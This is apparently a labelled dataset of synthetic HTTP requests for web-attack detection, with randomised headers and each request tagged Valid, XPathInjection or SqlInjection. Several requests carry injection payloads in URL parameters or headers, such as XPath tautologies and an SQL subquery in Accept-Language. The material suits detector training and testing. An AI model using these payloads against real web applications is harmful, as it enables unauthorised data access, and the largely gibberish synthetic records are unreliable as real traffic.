GET /naehmdrtleO/NechoZpHJYcbetween68ps/o5oebdb6tgAyl7Fareev/tJfX2tmp/okbFYygj@QK/swx/9o.css?n8l=667439458&beehrxfn1nzrCR=17993&wlgedeialk=50889464&s2jt=718&Tbd=o4v%40SeO8X1Z&deh6tE5htd=lr%2FaOJ3%26eanlt%40&wkBi=ns+%28&x4=+poohqdconnect7iye&ihhjthes8o7b=7143&window.openIupdateoF=hoXBAz482XCU&replaceKY8XO=r%24N&Livhnieroya=217350&zdhgnhKnu=81&rs0n=shotn HTTP/1.0
Host: 59.114.216.149:80
Connection: Roe6Oem
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: Ema5-epBuo5c, reP-6umea, o-euu;q=0.5, lnee3pa-bEohxoms;q=0.0, hodfoim-reNot;q=0.6
Cache-Control: t=i
Client-ip: 57.117.20.44
Cookie: CFe5anettyh=71624651
Cookie2: $Version="5"
Date: Thu, 14 May 09 02:37:07 UTC
ETag: W/"IPwbQS42u@D8EHP"
Expect: Tlthm8as=nejwsef;Ss5uz=s1ajoS
From: OolLe3@sxRs.net
If-Modified-Since: Thu, 12 Jul 07 14:58:08 GMT
If-Unmodified-Since: Sat, 10 Dec 05 04:09:32 UTC
If-Match: "8MHwtYI@_vZIcRvL."
If-None-Match: "YyC.Hy5Iyr8BPy_kJ"
If-Range: Fri, 20 Mar 09 20:12:12 CET
Max-Forwards: 323
MIME-Version: 1.5
Pragma: hntei='ao5rnd'
Proxy-Authorization: NTLM bjhlMWlsbWF0bWVvM2VoMnNUb3Bob252ZWxrQXRhcmlpeWhheg==
Authorization: NTLM dHRJbGk4cE90ZUVpOVRobkRDeGlvVmhuY2JnZEV4Y2VvVm91dGU=
Range: 2-254176
Referer: http://www.mden.st/tneligi/7cStIn/bvsfnmd/toiusr/fiohcgln.doc
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.6 (Windows; U; Win98 9.1; hm-2n; rv:9.4.2) Gecko/66257782
UA-CPU: PowerPC
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0564x652
Via: 8.0 www.chiihwot.jpeg:58
Transfer-Encoding: deflate
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 671 175.201.189.37 "gtdEwqaressoqzswEtt" "Sat, 22 Jul 06 04:39:44 GMT"
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20283
Start - Id: 49637
class: XPathInjection
GET /lmt3ee8ioma8ersyr/k.j/ntutdergi/rjLD@6Y3w2Bg.html?hni=euawe0Ua7&62NBformvd9C=709954706&yluthheer=b3og&EUhnJJ=xereip%27++++or++ceieit%2Ft0%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D84%5D++or+%27hb%27+++%3D%27 HTTP/1.0
Host: 137.196.48.207
Connection: yeNnwt
Accept: */*;q=0.1
Accept-Charset: windows-1253;q=0.7, windows-1252, cp-950
Accept-Encoding: 
Accept-Language: rci6-e3toyh5, ndiagres-3tdehrrO;q=0.8
Cache-Control: no-cache
Client-ip: 168.133.90.250
Cookie: sl0htIx=t;einh9ke6tenht=ldop2tiframe4l;eae=uet\;EqRe=264832
Cookie2: $Version="94"
Date: Sun, 20 Aug 06 11:47:21 GMT
ETag: W/"235Ird-L6KJI_ca"
Expect: roznzstA
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Sat, 05 May 07 16:23:39 CET
If-Unmodified-Since: Fri, 26 Dec 08 08:35:01 CET
If-Match: *
If-None-Match: "XmoKJgKIpAarrH53fUmW"
If-Range: "0fy946-0WLQMaM@N5I"
Max-Forwards: 635
MIME-Version: 2.4
Pragma: t2trt6=vsaT
Proxy-Authorization: NTLM bTdJZm9od3JhZXRidXJsMGJlbWtkemQ3RXVyZWVzanJkbHNnbjI=
Authorization: Buae mojX=Miuace
Range: 79860-827,72-9963,513431-
Referer: /MsaNfd/peHofoRl/snsh/lthNnYq.php
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: 3itled0ul01etmui9mcE
UA-CPU: PowerPC
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6458x943
Via: 7.4 90.48.242.51, 2.4 www.N3mkxnrc.gif
Transfer-Encoding: gzip
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 524 www.ufdAk.gif "c7tvlttbVv" 
X-Forwarded-For: 89.198.76.55
X-Serial-Number: 903451462
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49637
Start - Id: 41226
class: SqlInjection
GET /lw8tA/eeDdONHiK@6Vv_/tn.Oa0FbLGTngOvlhhd/Eu8e/7V/nAsggeaqe6eherude9xI.msf? HTTP/1.1
Host: www.g4xureent.net
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: and  0<>(select   count(*)   from    0prteeue  where     hntaIxra<>)
Cache-Control: only-if-cached
Client-ip: 206.238.177.255
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="006"
Date: Wed, 21 Nov 07 09:05:48 CET
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: stfhep2=ec7t3;aiefhny=dsiN9dg
From: eoinuyii@2ot3t.net
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Sep 05 09:45:42 UTC
Max-Forwards: 135
Pragma: ocst81en='tbnPE'
Authorization: NTLM OHRlaWVIaHNTbnJlaWxOcllzc2J0YWFzc3Q4c3Nhdmxsc2V3bXRyaWxUMg==
Referer: http://leddbh.org/asiyhig/teLsbeu/tPoeu/hmecin/teirtou.php4
TE: trailers,trailers
User-Agent: Mozilla/2.2 (Windows; U; WinNT 3.7; ec-xi; rv:5.9.6) Gecko/26503412
UA-CPU: 68000
UA-Disp: 940,2353,32
UA-Color: color32
UA-Pixels: 5345x867
Via: FTP/9.9 244.199.21.118
Transfer-Encoding: deflate
Upgrade: t4nl/2.0, rRkw/3.5, nqe/4.4
X-Serial-Number: 54822756786329442
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41226
Start - Id: 31650
class: Valid
GET /e_cOsL_B3cmdX/ajesnaohyeoozoZbreo/nxKbPJ4iyKWh_sK-eV3a/l@Q55Yn/nP-JL/7ILYU0u.shtml?teaAt9w=%5Dsce%5CIi%7Coaviuys&phpinsertgLLnFwp-Bbgsoundnca=+tacsVgfetmpo%3Dt&uqu5z=9120066&ahacevmahihdgow=36272496&eltert0ae8=68911&Udliken5boot.inik=693650&gNNTQ7tMf=ehi0toege&brtgeAngeHl=dmwh+e%3Eamimgxscript5-&0tw=l&0h3rd=781688&etcua=5916914 HTTP/1.1
Host: www.miywmahe1E.it
Connection: keep-alive
Accept: text/*, video/quicktime;q=0.6
Accept-Charset: iso-8859-5;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: 3ahgo='taotaniU'
Client-ip: 216.249.237.225
Cookie: g8ayNx=e;mw= it=ngnSci8eyty;6CPIKkU9=rnt;pvbi9pctep=r;sfngwsh=fe
Cookie2: $Version="4"
Date: Tue, 16 Mar 04 20:20:39 GMT
ETag: "MDg-mSLIJHgr30La"
Expect: 100-continue
From: re0gdk@esp6u.gov
If-Modified-Since: Sun, 10 Jun 07 21:47:07 GMT
If-Unmodified-Since: Tue, 24 Jul 07 06:52:47 CET
If-Match: *
If-None-Match: "z11ivkLjgsBZQWBT"
If-Range: Fri, 19 Mar 10 02:50:27 GMT
Max-Forwards: 1
MIME-Version: 6.6
Pragma: F=tc
Proxy-Authorization: Basic TmV3c2ExOmVObzFsZTll
Authorization: Basic RWdsZWI3OmZub3NhMg==
Range: 8087-,193934-,399995-4368
Referer: /fhuyo.jsp
TE: gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 1.1; nt-pV; rv:1.5.6) Gecko/63650783
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8191x528
Via: 5.9 158.237.16.2:4283, 1.5 www.7dssce.jpg, 7.6 141.23.229.95
Transfer-Encoding: gzip
Upgrade: noyiNn/8.3, tMu5aT/7.1, acs/5.6
Warning: 847 245.165.104.253:38182 "wolt9DaseP" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31650
Start - Id: 20365
class: Valid
GET /tZ7Y/tk/ttfwmnt1bedOheje1id/hrrtsasalhxsalrz5te/orse/alaeeDsoa/D.91is.shtml?hovbscriptWRftpQJFeOR=ohl%3Fi-fp%281gh&IyykFhHqreplacealq=tjUO%40BB9c HTTP/1.1
Host: 21.115.66.85
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rwafr-eeTh2usu;q=0.6, 2osAcEar-dde, ao-hxteA;q=0.3
Cache-Control: only-if-cached
Client-ip: 154.221.244.163
Cookie: ro=r;labesmrug=9210038
Cookie2: $Version="7"
Date: Fri, 11 Jun 04 19:36:25 GMT
ETag: W/"kbJwDZZuO4a1KvNtyWz"
Expect: 5htk
From: ueaw@nsel.fr
If-Modified-Since: Wed, 28 Jul 04 13:43:35 GMT
If-Unmodified-Since: Sun, 30 Oct 05 13:23:48 UTC
If-Match: "JuU13t2JPV@NHS2e5uI"
If-None-Match: *
If-Range: "cSsedYKUpDKkzTPH-d3x"
Max-Forwards: 8610
MIME-Version: 0.0
Pragma: dRrnl='brrio'
Proxy-Authorization: Basic bzJlZW50ZXA6dHdpYWU=
Authorization: Basic Y20wbnFlZXI6ZG9vY2U=
Range: 930847-82164,1-528510
Referer: /4nelrd/bmylhuae/aeY6a.avi
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/6.4 (compatible; Konqueror/2.8; Open BSD i386; leurdne)
UA-CPU: Sparc
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: FTP/8.2 www.tgfp.gif, HTTP/2.0 www.2tEni.html, 0.6 www.tedr.jpeg
Transfer-Encoding: gzip
Upgrade: nxt3/7.1
Warning: 906 176.243.168.21 "eorneinhwtfccewarec" 
X-Forwarded-For: 240.25.195.20
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20365
Start - Id: 30578
class: Valid
GET /fst/webLe80mScS/sasnevA0teq/wO_U47OAhnrnQrWr1/airvjibTpo27reN/e5f1tQHRc6C8r87NJKQd/ClikeTDmservicesM.php3?oosohpsnxmm=9cdinsi&ecoaivqIvheiile=2&i12Ooh=1492&QMCZ0NXV=srklfrtfdy6&rnwpedo5te=xcrlo HTTP/1.1
Host: www.oo3imd.gov
Connection: dyEeu
Accept: application/*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=38
Client-ip: 61.132.5.63
Cookie: Ferolwi=lnnJYeuJSWB;iMguSJcmdE_=tcF2enR5na8qnt1;4Ylib05hb=aFIlR@;elohe4nel=6494346
Cookie2: $Version="2"
Date: Thu, 08 Oct 09 10:21:14 CET
ETag: "85sRP9tymf1-l02eG@9"
Expect: aina8
From: hmin@oar8.com
If-Modified-Since: Sun, 12 Sep 04 06:33:42 GMT
If-Unmodified-Since: Tue, 31 Jul 07 14:20:37 CET
If-Match: *
If-None-Match: "8rmIH@F0Qb58i_d"
If-Range: Sat, 12 Dec 09 19:31:55 GMT
Max-Forwards: 3121
MIME-Version: 9.2
Pragma: jej='ggne6'
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: Digest realm
Range: -185
Referer: /damnee/ueeghnc/nz7settp.js
TE: deflate;q=0.2
Trailer: Warning
User-Agent: Mozilla/6.3 (Windows; U; Win 9x 9.7; jn-it; rv:6.1.9) Gecko/95435372
UA-CPU: 68000
UA-Disp: 537,7746,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0605x4751
Via: FTP/1.7 38.155.8.248
Transfer-Encoding: deflate
Upgrade: iicoun/9.2, tlnhD/8.4, i5ise/8.9
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 132.1.3.118
X-Serial-Number: 389571955
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30578
Start - Id: 24850
class: Valid
GET /tvDj.zSmeigYr_.9xS/sujVKQr9fA2MgWq2w0p/khft0/jv8Roen8/hAOehiptzo/l2Rs/l5oqcKW7RpinBBtCE/ieo/sPJcUoN5ZLAF6V7KWUrJ/o9v/idsgbmeQpw_.php?oqr4ce=hroatt&oheacogeil0=s-0%5Cu&6jmegesniyl9ee=962811544&eoanetjBer=3299985187&h7tdaeaat=ikg_ZoEJ3Jo&crmau9wsb=5aarjuet&tpnpEse1=745738&wzidE=nnhme&eeEotlv8=rmsaswp-styleeds%2Flvtnodedeletelike HTTP/1.0
Host: 91.68.247.252
Connection: ruahnn
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 137.199.163.239
Cookie: Iokwi5Inri=t9thle+5hnllo:Mc;lonhcto=cdtprocessing-instructioni r
Cookie2: $Version="62"
Date: Thu, 20 Mar 08 08:40:39 GMT
ETag: W/"0i7CyD7zJa5qpKJIr-2"
Expect: kdoifc=dfiooiv;hrltuba
From: neyaahot@swrEr.com
If-Modified-Since: Tue, 18 Mar 08 02:13:34 UTC
If-Unmodified-Since: Sun, 29 Oct 06 17:21:04 CET
If-Match: ".FYthfPs5sIQ.aKd@_PX"
If-None-Match: *
If-Range: Sun, 12 Sep 04 15:37:17 UTC
Max-Forwards: 14
MIME-Version: 1.3
Pragma: p6obse='non'
Proxy-Authorization: Digest algorithm=wowvs
Authorization: NTLM ZDZSdnQ1aGlldGJpQWlpNzJiNXRnZm93dGFhdXNId3JlZTBlbA==
Range: 0789-045,78332-8,705547-860
Referer: /avmkiss7/keyb09o/lnpritgm/isndr.php4
TE: deflate,trailers,trailers
Trailer: Upgrade
User-Agent: pdearaedd (o6Y.P6dU)
UA-CPU: MIPS
UA-Disp: 679,174,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 317x506
Via: rt27/0.3 www.af0s.shtml:3175, 6.8 45.91.148.201, 9.0 www.ofpyes.htm
Transfer-Encoding: gzip
Upgrade: eThto/9.1, osm3d/8.9, tnv9v/5.6
Warning: 240 14.25.208.219 "aatjoiEmtgaDCnkname" 
X-Forwarded-For: 185.160.195.192
X-Serial-Number: 934492
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24850
Start - Id: 4416
class: Valid
POST /hjRsZyKodR/CkB8body6/4g/5opbre/iS1wA-AXvybAepdqUk/dHxjIkIhxilocation/raandYsh8eeeb/xr20wmtois8sn/sbqtndrenstoNh8s/Sc8iEssseN9.tiff? HTTP/1.0
Content-Length: 273
Content-Language: in,Lde,yeSdu8
Content-Encoding: identity
Content-Location: http://www.epaEt.ch/oonrsl/ndfetoit/enessa/n1et.msf
Content-MD5: ZWh0c25zb3N0YTF6QWhOVw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Jun 08 19:02:44 GMT
Last-Modified: Tue, 10 Jun 08 12:07:36 UTC
Host: www.rt8heepX.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-greek;q=0.3, utf-7
Accept-Encoding: gzip;q=0.3, compress, deflate, compress
Accept-Language: *
Cache-Control: max-age=206
Client-ip: 248.197.153.84
Cookie: n2osps2qetmd=6YvIK;gm=ot(reat?gsgv;jh6moepeilleE=8
Cookie2: $Version="640"
Date: Thu, 09 Jul 09 10:42:42 UTC
ETag: W/"_BZ7hFXiVIQmxID"
Expect: thinleo
From: dclye@1rnntrwrw.ch
If-Modified-Since: Wed, 30 Nov 05 08:41:15 CET
If-Unmodified-Since: Fri, 03 Apr 09 07:19:27 CET
If-Match: "2-1F8tCaMUFZet27DEU7"
If-None-Match: *
If-Range: Wed, 08 Nov 06 19:46:00 UTC
Max-Forwards: 9
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM ZHNMc09kckVEZTduYnJkaXRpa3NlOXlobnRudEFpaGxsbWllUzFlZTdvb3Fx
Authorization: onqq ebmes4ht=eeaul1ce
Range: 498-,-00,-182003
Referer: /tRetpie/s2tl8fht/roTxi/atnrmoM.swf
TE: gzip;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.7 (compatible; h3u2gwn; Linux i386; leeUerMOid; ou5ltf)
UA-CPU: Sparc
UA-Disp: 3339,068,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6849x3464
Via: 6.0 23.75.103.189:600
Transfer-Encoding: gzip
Upgrade: aw7qe/7.0, Owgd/5.7
Warning: 486 51.49.137.87 "yuaievttaTtrretzb0" 
X-Forwarded-For: 92.174.150.38
X-Serial-Number: 854134034
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

k9=aa88s&Twa=ht8&nhl9H3=aaen&pBaandlNhOw=Ran9aaed6sf&u-5Eetc=waegaccept=5e0ribji&enenkOah=009807638&n3her6ltmeemt=sohaHshrthderat&1i7eu=0&Aebid85clnnus=coEtTonqn5ehosLa&Nwwhere@=diFSDCPIc&K4rg8=Eeia;hul@5x<childchildlsneliE&h0urqfsdC=68&T@9_select6optcHNnH=idtwseon

End - Id: 4416
Start - Id: 34640
class: Valid
POST /2f/sgrAraflonsha/ddpKHLAuC46oOGF1Nnz/uadrYi/reAb3w@l6YwrKt/exaktinljOnhng.png? HTTP/1.0
Content-Length: 21
Content-Language: moe
Content-Encoding: compress
Content-Location: http://su6eona.be/swtdsl/ilei40.php3
Content-MD5: ZGFTdHJXOEM3clRKbmhucg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Jan 04 24:07:53 UTC
Last-Modified: Sat, 17 Nov 07 17:18:29 CET
Host: www.E0yeeUu.gov
Connection: yla7ers7
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: opRn-da
Cache-Control: no-store
Client-ip: 67.93.72.22
Cookie: ueynil=428710;cmdhtaccestelnetGg8cwrj@g=tlgtQStJYc;biNavaLneaqghs3=hiaro;pe8pc8l=acall;oj3n=btu17=i=gedhRarRj;_Wznc71OY=%rU@ehcme|Ae1xmlcou a=
Cookie2: $Version="94"
Date: Sat, 17 Sep 05 17:47:55 GMT
ETag: W/"U4tFtReVabM2glQ"
Expect: s4htsLsi=h86e
From: n4Wig7Rx@ieiopg8y.it
If-Modified-Since: Wed, 08 Jun 05 09:25:51 CET
If-Unmodified-Since: Fri, 02 May 08 05:10:03 CET
If-Match: *
If-None-Match: "MAd0RzE4eASy1JuU_D"
If-Range: "1NNvjpxSHlqz6V0gVE@P"
Max-Forwards: 473
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZWFicElhTDo3aW9ubQ==
Authorization: Basic ZWVUYWU6bGFuRmFvYg==
Range: -2054
Referer: http://www.e5acn.it/fwh4/o2p3/byhesug/tcpaaS/2ITei.mpeg
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 2.5; ge-rR; rv:1.1.3) Gecko/78753097
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3397x406
Via: 1.1 www.neeh7e.html
Transfer-Encoding: compress
Upgrade: 0lmc/3.2
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bslhn4=1r@Y.td0l8fM

End - Id: 34640
Start - Id: 49722
class: XPathInjection
GET /dia/rDtp7KyG0dk8Kprocessing-instructionW/dtafAufl1E0tdi4/rzpRn8tcoif8d99niopi/amsltsShsttr/hE/shqM8/h.KVTzxwbJ9/rUF.htm?9e=oaaservices1&PlikehtaccesevallrhttpwfV3=Ssranhe&FtqB44G=%3Esboot.ini&qGti=ye%2Btt%2B3sacatcechoasIe&zV-C5@3=Oud%2F1seoix%2Fi%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D147%5D+++++%7C+++++rn%2Fe%2Fo9i%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++or+++++%27g7cs%27+%3D%27&aoga=ioytjt&ler=nos&46etjNn5tyqsj=SaWuhnHrMrabm8&bfks=lk&Flhxy3Ftunl=lpeg&sr=044&euYaBaan=iRoscqmhTub HTTP/1.1
Host: www.ntsgja.fr
Connection: keep-alive
Accept: text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 173.103.247.250
Cookie: gahEzdoooegq=s0dYvreorI;rUClsC=o0;2sluh3eeoEo=08822
Cookie2: $Version="6"
Date: Sun, 09 Jan 05 19:56:04 CET
ETag: "iITkPXqitf-bCHofqIg"
Expect: 100-continue
From: u5ln@onsTkmM.ch
If-Modified-Since: Thu, 29 Jun 06 22:29:18 CET
If-Unmodified-Since: Sun, 20 Sep 09 06:20:50 UTC
If-Match: "9w1jVsfeOf0efabXwyI"
If-None-Match: *
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 2678
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: NTLM bHdycmRnbWVyYXJzZXR0a28zOU0ybW1yZmVoZ3dlZXRw
Range: -5,-8543,85-24971
Referer: /scyec9ta/eesh/dvic.jsp
TE: trailers
Trailer: Accept
User-Agent: Mozilla/0.9 (Windows; U; Win 9x 7.3; wo-ig; rv:2.6.7) Gecko/89991485
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 9.9 www.teez.gif, 6.7 www.wlycsnOx.js, 4.7 www.leys.png
Transfer-Encoding: deflate
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49722
Start - Id: 6638
class: Valid
POST /iOoSPehta/ecp6cJAx/wann/PCgPE/ioa1shootfexdeBty/RGORPsqXfO/x@zKpbJ./scriptnbLlfQDladminY/eZrtdorsoemo9/deDsny.mspx? HTTP/1.1
Content-Length: 105
Content-Language: bc8sneiI
Content-Encoding: deflate
Content-Location: http://www.3hbnryS6.ch/ahR3h/shtdelry/bnievh6w/esgiw.gif
Content-MD5: cm5lc2Vyb2Flc2F2Y2VCYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Jan 06 10:55:05 CET
Last-Modified: Sat, 26 Jul 08 20:09:12 CET
Host: www.0c7w.fr
Connection: keep-alive
Accept: image/png;q=0.5, image/*
Accept-Charset: gb2312;q=0.1, iso-8859-15;q=0.1, utf-8, windows-1257;q=0.5, iso-8859-2
Accept-Encoding: identity, identity;q=0.7, deflate;q=0.4, compress, compress;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 46.201.126.153
Cookie: hoe=67215183;rtlnrt=nY7;deiaaad=1969793;7recndsu=6ed'
Cookie2: $Version="345"
Date: Tue, 06 Jan 09 16:20:55 GMT
ETag: W/"v7N@UYgIYxK63@18EeG"
Expect: 100-continue
From: opcra@uqeH.it
If-Modified-Since: Tue, 26 Oct 04 12:56:32 CET
If-Unmodified-Since: Fri, 10 Nov 06 03:46:21 CET
If-Match: *
If-None-Match: "2k-4U7oX-xz@9a6zRs-"
If-Range: Fri, 28 Jul 06 12:11:31 UTC
Max-Forwards: 09
MIME-Version: 0.0
Pragma: niefoi='x9s3a'
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: nie9v mbstnt=uhIrntbi
Range: -08,-241,7-856
Referer: /5u6soi/EsN6esS/ANmgotgp.php3
TE: chunked
Trailer: Pragma
User-Agent: yaut8H4Z http://www.hdmhe.fr
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 792x1593
Via: 1.5 www.gstlcC2.css:00201, 0.8 www.PaelH.png, 9.8 245.188.234.56
Transfer-Encoding: deflate
Upgrade: zfoa/4.4, me8e/8.0, eH5/5.3
Warning: 107 www.Hiehri.js "eswanigari" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

1moof=6&zOkJLB1=34964651&ylaRht7tp=5w<&ihormnio&earn1rl63qhbMEO=u@Vy-whY_NC4&r1cbself0tr=0530521689

End - Id: 6638
Start - Id: 1256
class: Valid
GET /nq94BwEaIIgOiHlJ.dll?Y3tqrtnaateL=2136 HTTP/1.1
Host: 215.79.168.121:025
Connection: EYuot
Accept: audio/basic;q=0.8, video/*;q=0.9
Accept-Charset: windows-1254;q=0.7, cp-950
Accept-Encoding: gzip, compress
Accept-Language: t9czai-oe;q=0.0, gmo-hswesn;q=0.8
Cache-Control: min-fresh=30783
Client-ip: 212.163.198.161
Cookie: mnfOa=2D54-d
Cookie2: $Version="279"
Date: Tue, 10 Jun 08 08:36:00 UTC
ETag: W/"FPEdrK1W.XkCkLs"
Expect: afoga=htf3
From: dSeu@yRMgnu.net
If-Modified-Since: Tue, 06 Sep 05 05:39:19 UTC
If-Unmodified-Since: Sun, 17 Sep 06 11:19:06 UTC
If-Match: "bV@Y5DlD7wH4--M03e"
If-None-Match: *
If-Range: Fri, 09 Jun 06 02:00:19 CET
Max-Forwards: 3869
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: nhcD swatey=b4qt
Range: -709
Referer: /geoqlitV/hsjn63/thsbzLi.jsp
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.1 (Windows; U; Windows NT 3.2; a3-tl; rv:6.8.8) Gecko/18533405
UA-CPU: Sparc
UA-Disp: 4986,1989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7645x440
Via: 6.3 www.jnEecG7n.js:6971, HTTP/6.3 229.247.69.9
Transfer-Encoding: t4oipO
Upgrade: oisa/9.7, yntnte/0.1
Warning: 995 www.d0torsa.jpeg:3081 "RcaejnliMt062" 
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 51978605
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1256
Start - Id: 21459
class: Valid
GET /dgPr/n304KoZGLwebN@MESNSK/uSJIV/as/awDlsnSf/ojh0msm/sU9Sq4iGk84/59sma/haedngwa48isqeto/0bVM_4Z3PFW0gbw4z.exe?dthesbthid=514&Dautoexecbcr5=74259964&whg=gmypaAen&g7r=ae&RRIHpcPs=aq+&tt1_UlrvNnetcat=0&ht0t=hM%27n&wioeTpd=lveesb&Lg6rtay=8 HTTP/1.0
Host: 237.112.104.48
Connection: 2O7iez
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp;q=0.3, euc-tw, windows-1251
Accept-Encoding: gzip;q=0.8, identity, deflate;q=0.2, identity, compress;q=0.6
Accept-Language: g-Zzt;q=0.6, o-odsexyj, Anfso4e-hwl;q=0.4, dosbli-HirhO, el2ol-smviv
Cache-Control: no-cache
Client-ip: 70.74.65.196
Cookie: Qelaxee5ot=xb1vsxvarf;hbectc=889;astdaErnrl64s=ie:ne-stdin9;oypf=o$dYCexecmhc6O;edj2luUaptta=recans;NNth=?']e
Cookie2: $Version="0"
Date: Fri, 14 Apr 06 04:50:58 CET
ETag: W/"Y.O-0uEW4tNzrNYwA"
Expect: dteder
From: eaheebse@4eGrkw.uk
If-Modified-Since: Fri, 11 Mar 05 03:33:19 GMT
If-Unmodified-Since: Fri, 24 Mar 06 21:22:55 CET
If-Match: *
If-None-Match: *
If-Range: "j_A98rYEPRFXA@t"
Max-Forwards: 21
MIME-Version: 8.8
Pragma: acRvxd3='u5'
Proxy-Authorization: Digest qop=auth
Authorization: Digest algorithm=mnen
Range: 21333-1766,-00,-67436
Referer: http://www.fair5.cz/meieie/poueott.shtml
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/3.1 (compatible; MSIE 5.6; WinNT; swo1egpt; onrae; a21ThRoh)
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x8201
Via: 1.0 165.249.84.114:223, FTP/1.0 www.hEi6r.tiff, FTP/8.9 www.bdbo.gif
Transfer-Encoding: ei41n; nqti=dnmdo1
Upgrade: aE4/5.1, aNco/7.8, nenln/5.7
Warning: 502 www.le6w08da.jpeg "cfeinF" 
X-Forwarded-For: 153.129.48.252
X-Serial-Number: 53165421880572
----: -----------------------------
